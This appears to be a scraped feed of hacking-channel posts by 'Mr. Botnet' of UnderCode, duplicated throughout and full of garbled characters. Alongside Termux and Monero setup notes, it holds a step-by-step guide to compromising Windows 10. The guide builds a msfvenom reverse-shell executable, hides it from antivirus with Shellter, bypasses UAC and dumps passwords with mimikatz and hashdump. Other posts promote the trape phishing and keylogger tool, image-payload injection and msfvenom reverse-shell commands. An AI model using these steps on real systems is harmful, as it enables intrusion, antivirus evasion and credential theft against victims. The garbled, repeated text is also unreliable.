> When a miner forms a valid block of transactions, the individual will broadcast the block to other miners on the network. It can only be accepted if all transactions in a block are valid according to the existing record on a blockchain. However, a corrupt minor with more than 50% of a network's hash rate does not broadcast solutions to the rest of the network. It results in the formation of two versions of the blockchain. One is the public version of the blockchain, which is being followed by legitimate miners. And second is use by the corrupt miners who are not broadcasting it to the rest of the network.
Written By Mr. Botnet(tm)
- - - - - - UาNาDาEาRาCาOาDาEา- - - - -
Written By Mr. Botnet(tm)
- - - - - - UาNาDาEาRาCาOาDาEา- - - - -
โโโโโ-๐๐D๐๐๐ฎ๐D๐โโโโโ
๐ฆTERMUX some commands BY UnderCode
(T.me/UnderCodeTestingOfficial)
๐ฆINSTALLING Packages:
Letโs install some basic packages. To install packages in termux, the command used is:
> pkg install
๐ฆUpdate and upgrade:
>pkg update
>pkg update && pkg upgrade
๐ฆInstalling Python:
>pkg install python
>For Python2
>pkg install python2
>For Python3
>pkg install python3
๐ฆInstalling pip:
>pkg install python-pip
๐ฆInstalling Git:
>pkg install git
๐ฆInstalling wget:
>pkg install wget
๐ฆUninstalling Packages:
>pkg uninstall pkg-name
๐ฆList all install packages:
>pkg list-all
๐ฆInstalling Deb files:
You can similarly manage dpkg too. In case youโve got a .deb file, you canโt install it using pkg install command. To install such a file, dpkg is used.
๐ฆInstalling:
>dpkg -i ./package.deb
๐ฆUninstalling:
>dpkg โremove [package name]
๐ฆListing all installed packages:
>dpkg -l
๐ฆRest of the commands are almost the same as basic Debian Linux command line.
>Graphical Environment setup:
๐ฆTo enable GUI support in termux, make sure youโve VNC viewer or Xserver support installed on your device. Iโd suggest a VNC viewer. Itโs stable and a better choice for GUI. For a better experience use any third party hardware acceleration app as there is no such support available in termux by default.
๐ฆAs I mentioned above, the GUI support uses X11. The X11 packages are available in a separate repository. To enable X11 for GUI support run the following command:
>pkg install x11-repo
WRITTEN BY MR: Botnet(t.m)
โโโโโโ๐๐D๐๐๐ฎ๐D๐โโโโโ-
๐ฆTERMUX some commands BY UnderCode
(T.me/UnderCodeTestingOfficial)
๐ฆINSTALLING Packages:
Letโs install some basic packages. To install packages in termux, the command used is:
> pkg install
๐ฆUpdate and upgrade:
>pkg update
>pkg update && pkg upgrade
๐ฆInstalling Python:
>pkg install python
>For Python2
>pkg install python2
>For Python3
>pkg install python3
๐ฆInstalling pip:
>pkg install python-pip
๐ฆInstalling Git:
>pkg install git
๐ฆInstalling wget:
>pkg install wget
๐ฆUninstalling Packages:
>pkg uninstall pkg-name
๐ฆList all install packages:
>pkg list-all
๐ฆInstalling Deb files:
You can similarly manage dpkg too. In case youโve got a .deb file, you canโt install it using pkg install command. To install such a file, dpkg is used.
๐ฆInstalling:
>dpkg -i ./package.deb
๐ฆUninstalling:
>dpkg โremove [package name]
๐ฆListing all installed packages:
>dpkg -l
๐ฆRest of the commands are almost the same as basic Debian Linux command line.
>Graphical Environment setup:
๐ฆTo enable GUI support in termux, make sure youโve VNC viewer or Xserver support installed on your device. Iโd suggest a VNC viewer. Itโs stable and a better choice for GUI. For a better experience use any third party hardware acceleration app as there is no such support available in termux by default.
๐ฆAs I mentioned above, the GUI support uses X11. The X11 packages are available in a separate repository. To enable X11 for GUI support run the following command:
>pkg install x11-repo
WRITTEN BY MR: Botnet(t.m)
โโโโโโ๐๐D๐๐๐ฎ๐D๐โโโโโ-
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆ THE Cryptonote developers Script tested NEW RELEASE ๐ฆ
Monero: the secure, private, untraceable crypto...
(followme๐ instagram.com/UnderCodeTestingCompany)
๐ฆINSTALLISATION & RUN:
1) Clone recursively to pull-in needed submodule(s):
> git clone --recursive https://github.com/monero-project/monero
> If you already have a repo cloned, initialize and update:
2) cd monero
3) git submodule init
4) git submodule update
๐ฆBuild instructions
> Monero uses the CMake build system and a top-level Makefile that invokes cmake commands as needed.
> On Linux and macOS
5) Install the dependencies
> Change to the root of the source code directory, change to the most recent release branch, and build:
6) cd monero
7) git checkout release-v0.15
8) make
9) The resulting executables can be found in build/release/bin
> Add PATH="$PATH:$HOME/monero/build/release/bin" to .profile
10) Run Monero with monerod --detach
11) Optional: build and run the test suite to verify the binaries:
12)- make release-test
13) core_tests test may take a few hours to complete.
14) Optional: to build binaries suitable for debugging:
> make debug
15) Optional: to build statically-linked binaries:
> make release-static
๐ฆTESTED ON:
> Raspberry Pi Zero with a clean install of minimal Raspbian Stretch
> macOS 10.11 amd64 macOS 10.11 amd64
> macOS 10.12
> Windows (MSYS2/MinGW) amd64
> Ubanto
Written By Mr. Botnet(tm)
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆ THE Cryptonote developers Script tested NEW RELEASE ๐ฆ
Monero: the secure, private, untraceable crypto...
(followme๐ instagram.com/UnderCodeTestingCompany)
๐ฆINSTALLISATION & RUN:
1) Clone recursively to pull-in needed submodule(s):
> git clone --recursive https://github.com/monero-project/monero
> If you already have a repo cloned, initialize and update:
2) cd monero
3) git submodule init
4) git submodule update
๐ฆBuild instructions
> Monero uses the CMake build system and a top-level Makefile that invokes cmake commands as needed.
> On Linux and macOS
5) Install the dependencies
> Change to the root of the source code directory, change to the most recent release branch, and build:
6) cd monero
7) git checkout release-v0.15
8) make
9) The resulting executables can be found in build/release/bin
> Add PATH="$PATH:$HOME/monero/build/release/bin" to .profile
10) Run Monero with monerod --detach
11) Optional: build and run the test suite to verify the binaries:
12)- make release-test
13) core_tests test may take a few hours to complete.
14) Optional: to build binaries suitable for debugging:
> make debug
15) Optional: to build statically-linked binaries:
> make release-static
๐ฆTESTED ON:
> Raspberry Pi Zero with a clean install of minimal Raspbian Stretch
> macOS 10.11 amd64 macOS 10.11 amd64
> macOS 10.12
> Windows (MSYS2/MinGW) amd64
> Ubanto
Written By Mr. Botnet(tm)
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
Instagram
Login โข Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.
๐ฆANONYMOUS RUSSIAN HACKERS WORKS TO DDOS WHATSAPP& FCB SERVICES AGAIN ๐ฆ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆHow to Attack Windows 10 Machine with Metasploit on Kali Linux + Create Undetectable Virus: FULL
(t.me/UnderCodeTestingOfficial) :
๐ฆLET S START:
1) Creating a Malicious .exe File:
> To create the executable, you would use msfvenom as shown in the command below:
> msfvenom -p windows/meterpreter/reverse_tcp -a x86 โplatform windows -f exe LHOST=(IP) LPORT=4444 -o /root/something32.exe
> this will generate generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload.
2) IN SAME COMMAND to get id adress type ifconfig in Terminal
3) Antivirus solutions work by detecting malicious signatures within executables.
4) The payload file will thus be flagged as malicious once within the Windows environment. We therefore have to figure out a way to modify it to bypass antivirus detection. We will encode it to make it fully undetectable, or FUD.
๐ฆMaking the Executable FUD (Fully Undetectable)๐ฆ
5) To encode our executable, we shall be using Shellter. Shellter works by changing the executableโs signatures from the obviously malicious one to a completely new and unique one that can bypass detection.
so type in terminal:
> sudo apt-get install shellter
6) Launch as bash then type A ( auto-mode)
7) Put the path of the file (payload created in steps (before)
+ press enter
8) Shellter will then initialize and run some checks. It will then prompt you whether to run in stealth mode. Select โYโ for yes.
9) The next prompt will require you to enter the payload, either a custom or a listed one. You should select a listed one by typing โLโ, unless you want to proceed with your own custom payload. Select the index position of the payload to use. We need a Meterpreter_Reverse_TCP, so we will have to go with โ1.โ
10) Enter LHOST and LPORT and press Enter. Shellter will run to completion and request you to press Enter.
11) run again
> msfconsole
use the generic payload handler โmulti/handlerโ using the command use multi/handler. We will then set the payload to match the one set within the executable using the command set payload
(in metasploite)
12) Executing the Payload
On copying the file to our target Windows machine
13) Since the file was not run as โadministrator,โ there are Meterpreter commands that canโt be run as they would result in an โaccess deniedโ response. This can be confirmed by running the getuid command, which tells us that we are running as user x ...
14) To prove that the user lacks enough privileges, we attempted to run the command mimikatz_command -f sekurlsa::logonPasswords.
15) Privilege Escalation
Privilege escalation allows us to elevate privileges from our less privileged user (l3s7r0z) to a more privileged one, preferably the SYSTEM user, which has all administrative rights.
Metasploit by default provides us with some methods that allow us to elevate our privileges. On the Meterpreter prompt we use the
> getsystem command
16) getsystem all fail, we need an alternative method of elevating privileges. We will use the comhijack exploit module that is used to bypass User Access Control. To do so, we โbackgroundโ our Meterpreter session, switch our exploit from multi/handler to windows/local/bypassuac_comhijack and implement this on the session in the background using set SESSION 2.
17) We then set the payload using set payload windows/x64/meterpreter/reverse_tcp and set the LPORT and LHOST. We then run the exploit.
18) WELL DONE ๐ฆ
With these privileges, we can do quite a lot on our compromised target. For instance, we can obtain LM and NTLM password hashes using the hashdump command as shown above. Note that the format of the hashes above is USERNAME:SID:LM_HASH:NTLM_HASH:::.
Written by ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆHow to Attack Windows 10 Machine with Metasploit on Kali Linux + Create Undetectable Virus: FULL
(t.me/UnderCodeTestingOfficial) :
๐ฆLET S START:
1) Creating a Malicious .exe File:
> To create the executable, you would use msfvenom as shown in the command below:
> msfvenom -p windows/meterpreter/reverse_tcp -a x86 โplatform windows -f exe LHOST=(IP) LPORT=4444 -o /root/something32.exe
> this will generate generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload.
2) IN SAME COMMAND to get id adress type ifconfig in Terminal
3) Antivirus solutions work by detecting malicious signatures within executables.
4) The payload file will thus be flagged as malicious once within the Windows environment. We therefore have to figure out a way to modify it to bypass antivirus detection. We will encode it to make it fully undetectable, or FUD.
๐ฆMaking the Executable FUD (Fully Undetectable)๐ฆ
5) To encode our executable, we shall be using Shellter. Shellter works by changing the executableโs signatures from the obviously malicious one to a completely new and unique one that can bypass detection.
so type in terminal:
> sudo apt-get install shellter
6) Launch as bash then type A ( auto-mode)
7) Put the path of the file (payload created in steps (before)
+ press enter
8) Shellter will then initialize and run some checks. It will then prompt you whether to run in stealth mode. Select โYโ for yes.
9) The next prompt will require you to enter the payload, either a custom or a listed one. You should select a listed one by typing โLโ, unless you want to proceed with your own custom payload. Select the index position of the payload to use. We need a Meterpreter_Reverse_TCP, so we will have to go with โ1.โ
10) Enter LHOST and LPORT and press Enter. Shellter will run to completion and request you to press Enter.
11) run again
> msfconsole
use the generic payload handler โmulti/handlerโ using the command use multi/handler. We will then set the payload to match the one set within the executable using the command set payload
(in metasploite)
12) Executing the Payload
On copying the file to our target Windows machine
13) Since the file was not run as โadministrator,โ there are Meterpreter commands that canโt be run as they would result in an โaccess deniedโ response. This can be confirmed by running the getuid command, which tells us that we are running as user x ...
14) To prove that the user lacks enough privileges, we attempted to run the command mimikatz_command -f sekurlsa::logonPasswords.
15) Privilege Escalation
Privilege escalation allows us to elevate privileges from our less privileged user (l3s7r0z) to a more privileged one, preferably the SYSTEM user, which has all administrative rights.
Metasploit by default provides us with some methods that allow us to elevate our privileges. On the Meterpreter prompt we use the
> getsystem command
16) getsystem all fail, we need an alternative method of elevating privileges. We will use the comhijack exploit module that is used to bypass User Access Control. To do so, we โbackgroundโ our Meterpreter session, switch our exploit from multi/handler to windows/local/bypassuac_comhijack and implement this on the session in the background using set SESSION 2.
17) We then set the payload using set payload windows/x64/meterpreter/reverse_tcp and set the LPORT and LHOST. We then run the exploit.
18) WELL DONE ๐ฆ
With these privileges, we can do quite a lot on our compromised target. For instance, we can obtain LM and NTLM password hashes using the hashdump command as shown above. Note that the format of the hashes above is USERNAME:SID:LM_HASH:NTLM_HASH:::.
Written by ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
UNDERCODE COMMUNITY
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - - ๐ฆHow to Attack Windows 10 Machine with Metasploit on Kali Linux + Create Undetectable Virus: FULL (t.me/UnderCodeTestingOfficial) : ๐ฆLET S START: 1) Creating a Malicious .exe File: > To create the executable, youโฆ
Not detected By Major Anti-Virus
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆPeople tracker on the Internet: OSINT analysis and research tool TESTED BY under Code: NEW release 2019
(instagram.com/UnderCodeTestingCompany)
๐ฆINSTALLISATION & RUN:
1) git clone https://github.com/jofpin/trape.git
2) cd trape
3) python2 -m pip install -r requirements.txt
4) python2 trape.py -h
๐ฆExample of execution:
> Example: python2 trape.py --url http://example.com --port 8080
๐ฆCommands run:
PROCESS HOOKS: Manages social engineering attacks or processes in the target's browser.
--- SEVERAL: You can issue a phishing attack of any domain or service in real time as well as send malicious files to compromise the device of a target.
--- INJECT JS: You keep the JavaScript code running free in real time, so you can manage the execution of a keylogger or your own custom functions in JS which will be reflected in the target's browser.
--- SPEECH: A process of audio creation is maintained which is played in the browser of the target, by means of this you can execute personalized messages in different voices with languages in Spanish and English.
๐ฆPUBLIC NETWORK TUNNEL: Trape has its own API that is linked to ngrok.com to allow the automatic management of public network tunnels; So you can publish the content of your trape server which is executed locally to the Internet, to manage hooks or public attacks.
> You can get information about the user's network.
--- SPEED: Viewing the target's network speed. (Ping, download, upload, type connection)
--- HOSTS OR DEVICES: Here you can get a scan of all the devices that are connected in the target network automatically.
--url In this option you add the URL you want to clone, which works as a decoy.
--port Here you insert the port, where you are going to run the trape server.
--accesskey You enter a custom key for the trape panel, if you do not insert it will generate an automatic key.
--injectcode trape contains a REST API to play anywhere, using this option you can customize the name of the file to include, if it does not, generates a random name allusive to a token.
--local Using this option you can call a local HTML file, this is the replacement of the --url option made to run a local lure in trape.
--ngrok In this option you can enter a token, to run at the time of a process. This would replace the token saved in configurations.
--version You can see the version number of trape.
--update Option used to upgrade to the latest version of trape.
--help It is used to see all the above options, from the executable.
Written by ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆPeople tracker on the Internet: OSINT analysis and research tool TESTED BY under Code: NEW release 2019
(instagram.com/UnderCodeTestingCompany)
๐ฆINSTALLISATION & RUN:
1) git clone https://github.com/jofpin/trape.git
2) cd trape
3) python2 -m pip install -r requirements.txt
4) python2 trape.py -h
๐ฆExample of execution:
> Example: python2 trape.py --url http://example.com --port 8080
๐ฆCommands run:
PROCESS HOOKS: Manages social engineering attacks or processes in the target's browser.
--- SEVERAL: You can issue a phishing attack of any domain or service in real time as well as send malicious files to compromise the device of a target.
--- INJECT JS: You keep the JavaScript code running free in real time, so you can manage the execution of a keylogger or your own custom functions in JS which will be reflected in the target's browser.
--- SPEECH: A process of audio creation is maintained which is played in the browser of the target, by means of this you can execute personalized messages in different voices with languages in Spanish and English.
๐ฆPUBLIC NETWORK TUNNEL: Trape has its own API that is linked to ngrok.com to allow the automatic management of public network tunnels; So you can publish the content of your trape server which is executed locally to the Internet, to manage hooks or public attacks.
> You can get information about the user's network.
--- SPEED: Viewing the target's network speed. (Ping, download, upload, type connection)
--- HOSTS OR DEVICES: Here you can get a scan of all the devices that are connected in the target network automatically.
--url In this option you add the URL you want to clone, which works as a decoy.
--port Here you insert the port, where you are going to run the trape server.
--accesskey You enter a custom key for the trape panel, if you do not insert it will generate an automatic key.
--injectcode trape contains a REST API to play anywhere, using this option you can customize the name of the file to include, if it does not, generates a random name allusive to a token.
--local Using this option you can call a local HTML file, this is the replacement of the --url option made to run a local lure in trape.
--ngrok In this option you can enter a token, to run at the time of a process. This would replace the token saved in configurations.
--version You can see the version number of trape.
--update Option used to upgrade to the latest version of trape.
--help It is used to see all the above options, from the executable.
Written by ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
Instagram
Login โข Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.
- - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆThe Best Online Antivirus Scanners
(instagram.com/UnderCodeTestingCompany):
๐ฆ1. Panda Cloud Cleaner
> https://www.pandasecurity.com/uk/homeusers/solutions/cloud-cleaner/
2. ESET Online Scanner
> https://www.eset.com/uk/home/online-scanner/
3. Google Chrome
> Wait, what? Google Chrome has an antivirus scanner? Thatโs right; you can scan your system files for nasties directly from Google Chrome. It does a decent job, too. As Chrome is the most popular browser around the world, there is a strong chance you already have it installed.
4. F-Secure Online Scanner
> https://www.f-secure.com/en_GB/web/home_gb/online-scanner
5. VIrus Total:
> https://www.virustotal.com/#/home/search
6. Metadefender
> https://metadefender.opswat.com/#!/
@ ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆThe Best Online Antivirus Scanners
(instagram.com/UnderCodeTestingCompany):
๐ฆ1. Panda Cloud Cleaner
> https://www.pandasecurity.com/uk/homeusers/solutions/cloud-cleaner/
2. ESET Online Scanner
> https://www.eset.com/uk/home/online-scanner/
3. Google Chrome
> Wait, what? Google Chrome has an antivirus scanner? Thatโs right; you can scan your system files for nasties directly from Google Chrome. It does a decent job, too. As Chrome is the most popular browser around the world, there is a strong chance you already have it installed.
4. F-Secure Online Scanner
> https://www.f-secure.com/en_GB/web/home_gb/online-scanner
5. VIrus Total:
> https://www.virustotal.com/#/home/search
6. Metadefender
> https://metadefender.opswat.com/#!/
@ ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
Instagram
Login โข Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.
- - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆ .gif and imagePayload Creating/Injecting tools For ANDROID 2019
(instragram.com/UnderCodeTestingCompany)
๐ฆINSTALLISATION ON OS X:
1-git clone https://github.com/chinarulezzz/pixload
2-sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl
3-cd pixload
4-docker build -t pixload .
5-docker run -v "$(pwd):/pixload" -it --rm pixload
6-./bmp.pl [-payload 'STRING'] -output payload.bmp
If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.
7-./bmp.pl -output payload.bmp
[>| BMP Payload Creator/Injector |<]
8-./gif.pl -output payload.gif
[>| GIF Payload Creator/Injector |<
[>] Generating output file
[โ] File saved to: payload.gif
[>] Injecting payload into payload.gif
[โ] Payload was injected successfully
9-/jpg.pl -place COM|DQT [-payload 'STRING'] -output payload.jpg
10-./jpg.pl -place COM|DQT [-payload 'STRING'] -output payload.jpg
11- -place COM:
The payload will be injected as a 'COMMENT'.
Written by ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆ .gif and imagePayload Creating/Injecting tools For ANDROID 2019
(instragram.com/UnderCodeTestingCompany)
๐ฆINSTALLISATION ON OS X:
1-git clone https://github.com/chinarulezzz/pixload
2-sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl
3-cd pixload
4-docker build -t pixload .
5-docker run -v "$(pwd):/pixload" -it --rm pixload
6-./bmp.pl [-payload 'STRING'] -output payload.bmp
If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.
7-./bmp.pl -output payload.bmp
[>| BMP Payload Creator/Injector |<]
8-./gif.pl -output payload.gif
[>| GIF Payload Creator/Injector |<
[>] Generating output file
[โ] File saved to: payload.gif
[>] Injecting payload into payload.gif
[โ] Payload was injected successfully
9-/jpg.pl -place COM|DQT [-payload 'STRING'] -output payload.jpg
10-./jpg.pl -place COM|DQT [-payload 'STRING'] -output payload.jpg
11- -place COM:
The payload will be injected as a 'COMMENT'.
Written by ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
- - - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆLets UnderStand How Payloads Work Full guide:
(instagram.com/UnderCodeTestingCompany)
1> Payload modules are stored in modules/payloads/{singles,stages,stagers}/<platform>.
2> When the framework starts up, stages are combined with stagers to create a complete payload that you can use in exploits. Then, handlers are paired with payloads so the framework will know how to create sessions with a given communications mechanism.
3> Payloads are given reference names that indicate all the pieces, like so:
4> Staged payloads: <platform>/[arch]/<stage>/<stager>
Single payloads: <platform>/[arch]/<single>
5> This results in payloads like windows/x64/meterpreter/reverse_tcp. Breaking that down, the platform is windows, the architecture is x64, the final stage we're delivering is meterpreter, and the stager delivering it is reverse_tcp.
6> Note that architecture is optional because in some cases it is either unnecessary or implied. An example is php/meterpreter/reverse_tcp. Arch is unneeded for PHP payloads because we're delivering interpreted code rather than native.
๐ฆKINDS:
1> Singles
Single payloads are fire-and-forget. They can create a communications mechanism with Metasploit, but they don't have to. An example of a scenario where you might want a single is when the target has no network access -- a fileformat exploit delivered via USB key is still possible.
2> Stagers
Stagers are a small stub designed to create some form of communication and then pass execution to the next stage. Using a stager solves two problems. First, it allows us to use a small payload initially to load up a larger payload with more functionality. Second, it makes it possible to separate the communications mechanism from the final stage so one payload can be used with multiple transports without duplicating code.
3> Stages
Since the stager will have taken care of dealing with any size restrictions by allocating a big chunk of memory for us to run in, stages can be arbitrarily large. One advantage of that is the ability to write final-stage payloads in a higher-level language like C.
๐ฆDelivering stages
> The IP address and port you want the payload to connect back to are embedded in the stager. As discussed above, all staged payloads are no more than a small stub that sets up communication and executes the next stage. When you create an executable using a staged payload, you're really just creating the stager.
> So the following commands would create functionally identical exe files:
1) msfvenom -f exe LHOST=192.168.1.1 -p windows/meterpreter/reverse_tcp
2) msfvenom -f exe LHOST=192.168.1.1 -p windows/shell/reverse_tcp
3) msfvenom -f exe LHOST=192.168.1.1 -p windows/vncinject/reverse_tcp
(Note that these are functionally identical -- there is a lot of randomization that goes into it so no two executables are exactly the same.)
> The Ruby side acts as a client using whichever transport mechanism was set up by the stager (e.g.: tcp, http, https).
In the case of a shell stage, Metasploit will connect the remote process's stdio to your terminal when you interact with it.
> In the case of a Meterpreter stage, Metasploit will begin speaking the Meterpreter wire protocol.
@ ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆLets UnderStand How Payloads Work Full guide:
(instagram.com/UnderCodeTestingCompany)
1> Payload modules are stored in modules/payloads/{singles,stages,stagers}/<platform>.
2> When the framework starts up, stages are combined with stagers to create a complete payload that you can use in exploits. Then, handlers are paired with payloads so the framework will know how to create sessions with a given communications mechanism.
3> Payloads are given reference names that indicate all the pieces, like so:
4> Staged payloads: <platform>/[arch]/<stage>/<stager>
Single payloads: <platform>/[arch]/<single>
5> This results in payloads like windows/x64/meterpreter/reverse_tcp. Breaking that down, the platform is windows, the architecture is x64, the final stage we're delivering is meterpreter, and the stager delivering it is reverse_tcp.
6> Note that architecture is optional because in some cases it is either unnecessary or implied. An example is php/meterpreter/reverse_tcp. Arch is unneeded for PHP payloads because we're delivering interpreted code rather than native.
๐ฆKINDS:
1> Singles
Single payloads are fire-and-forget. They can create a communications mechanism with Metasploit, but they don't have to. An example of a scenario where you might want a single is when the target has no network access -- a fileformat exploit delivered via USB key is still possible.
2> Stagers
Stagers are a small stub designed to create some form of communication and then pass execution to the next stage. Using a stager solves two problems. First, it allows us to use a small payload initially to load up a larger payload with more functionality. Second, it makes it possible to separate the communications mechanism from the final stage so one payload can be used with multiple transports without duplicating code.
3> Stages
Since the stager will have taken care of dealing with any size restrictions by allocating a big chunk of memory for us to run in, stages can be arbitrarily large. One advantage of that is the ability to write final-stage payloads in a higher-level language like C.
๐ฆDelivering stages
> The IP address and port you want the payload to connect back to are embedded in the stager. As discussed above, all staged payloads are no more than a small stub that sets up communication and executes the next stage. When you create an executable using a staged payload, you're really just creating the stager.
> So the following commands would create functionally identical exe files:
1) msfvenom -f exe LHOST=192.168.1.1 -p windows/meterpreter/reverse_tcp
2) msfvenom -f exe LHOST=192.168.1.1 -p windows/shell/reverse_tcp
3) msfvenom -f exe LHOST=192.168.1.1 -p windows/vncinject/reverse_tcp
(Note that these are functionally identical -- there is a lot of randomization that goes into it so no two executables are exactly the same.)
> The Ruby side acts as a client using whichever transport mechanism was set up by the stager (e.g.: tcp, http, https).
In the case of a shell stage, Metasploit will connect the remote process's stdio to your terminal when you interact with it.
> In the case of a Meterpreter stage, Metasploit will begin speaking the Meterpreter wire protocol.
@ ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
Instagram
Login โข Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.
- - - UาNาDาEาRาCาOาDาEา- - - -
๐ฆTop Exploit in WordPress: FULL TUTORIAL
(T.me/UnderCodeTestingOfficial)
๐ฆWordPress releases regular updates to ensure the platform stays secure. However, there are still cases where security leaks cause harm to many of its users. Most attacks come from WordPress plugins.
> The best way to protect yourself is to stay informed. Here, Iโll be covering some exploitable WordPress plugins that you should be aware of, and offer some advice on how to protect your site.
๐ฆWhat is an Exploitable Plugin?
Exploits are security holes present in programs and codes. According to research, WordPress is most vulnerable through unsafe plugins. In this sense, an exploitable plugin is one that comes with a security flaw that hackers can use to harm your WordPress site.
> Further, the CVE details reveal that XSS attacks are the most common hacking type on WordPress.
> Depending on the goal, attackers may breach your system by manipulating bugs or loopholes in the pluginโs code. If they gain access, the first warning signs include strange website behavior like redirecting visitors to malicious websites, or phishing emails to customers from your site โ the possibilities are endless.
> Thatโs why itโs important to spend time and learn more about both WordPress site security, and trusted plugins, which will put you at a lower risk.
๐ฆTypes of WordPress Pluginโs Security Issues
Before moving on, letโs learn about the most common types of WordPress plugin vulnerabilities:
1) Cross-site Scripting
This security issue happens on the client-side. The attackers plant malicious script on websites and execute them in the visitorsโ browser.
> Cross-site scripting is also effective for defacement โ changing a websiteโs appearance to show what the attackers want. This is a common tactic of the hacker group Anonymous.
2) SQL Injection
While cross-site scripting targets the client-side, SQL injections aim at the siteโs server. As the name suggests, this attack can affect websites that use SQL databases.
>A server stores all valuable information about a website and its users within databases. If an attacker manages to gain access to the databases, the information will be at risk and can be manipulated, stolen, or leaked.
3) File Inclusion Exploits
If your website allows users to upload files like photos or documents, you should be aware of this kind of threat. Hackers can use this to add harmful files to your site to manipulate your server by applying a specific configuration.
> There are two types of file inclusion exploits: Local File Inclusion (LFI) and Remote File Inclusion (RFI). The first needs a local file to be put on the server to execute the script, while the latter relies on a remotely-hosted file to do the work
Written by ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆTop Exploit in WordPress: FULL TUTORIAL
(T.me/UnderCodeTestingOfficial)
๐ฆWordPress releases regular updates to ensure the platform stays secure. However, there are still cases where security leaks cause harm to many of its users. Most attacks come from WordPress plugins.
> The best way to protect yourself is to stay informed. Here, Iโll be covering some exploitable WordPress plugins that you should be aware of, and offer some advice on how to protect your site.
๐ฆWhat is an Exploitable Plugin?
Exploits are security holes present in programs and codes. According to research, WordPress is most vulnerable through unsafe plugins. In this sense, an exploitable plugin is one that comes with a security flaw that hackers can use to harm your WordPress site.
> Further, the CVE details reveal that XSS attacks are the most common hacking type on WordPress.
> Depending on the goal, attackers may breach your system by manipulating bugs or loopholes in the pluginโs code. If they gain access, the first warning signs include strange website behavior like redirecting visitors to malicious websites, or phishing emails to customers from your site โ the possibilities are endless.
> Thatโs why itโs important to spend time and learn more about both WordPress site security, and trusted plugins, which will put you at a lower risk.
๐ฆTypes of WordPress Pluginโs Security Issues
Before moving on, letโs learn about the most common types of WordPress plugin vulnerabilities:
1) Cross-site Scripting
This security issue happens on the client-side. The attackers plant malicious script on websites and execute them in the visitorsโ browser.
> Cross-site scripting is also effective for defacement โ changing a websiteโs appearance to show what the attackers want. This is a common tactic of the hacker group Anonymous.
2) SQL Injection
While cross-site scripting targets the client-side, SQL injections aim at the siteโs server. As the name suggests, this attack can affect websites that use SQL databases.
>A server stores all valuable information about a website and its users within databases. If an attacker manages to gain access to the databases, the information will be at risk and can be manipulated, stolen, or leaked.
3) File Inclusion Exploits
If your website allows users to upload files like photos or documents, you should be aware of this kind of threat. Hackers can use this to add harmful files to your site to manipulate your server by applying a specific configuration.
> There are two types of file inclusion exploits: Local File Inclusion (LFI) and Remote File Inclusion (RFI). The first needs a local file to be put on the server to execute the script, while the latter relies on a remotely-hosted file to do the work
Written by ฬฏฬฏ ฬตอMฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
